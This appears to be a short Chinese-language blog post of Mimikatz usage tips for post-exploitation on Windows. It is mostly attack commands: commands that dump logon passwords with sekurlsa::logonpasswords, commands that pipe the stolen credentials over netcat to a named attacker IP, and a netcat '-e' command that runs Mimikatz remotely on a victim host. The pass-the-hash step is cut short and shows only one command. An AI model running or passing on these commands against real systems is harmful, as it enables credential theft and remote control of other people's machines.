Mimikatz 使用Tips
1.记录 Mimikatz输出:
1 | C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir |
2.将输出导入到本地文件:
1 | C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt |
3.将输出传输到远程机器:
Attacker执行:
1 | E:\>nc -lvp 4444 |
Victim执行:
1 | C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444 |
192.168.52.1 为Attacker IP
4.通过nc远程执行Mimikatz:
Victim执行:
1 | C:\>nc -lvp 443 |
Attacker执行:
1 | E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe |
192.168.52.128 为Victim IP
5.hash传递
1 | Privilege::debug |
之后会弹出cmd。
Be the first person to leave a comment!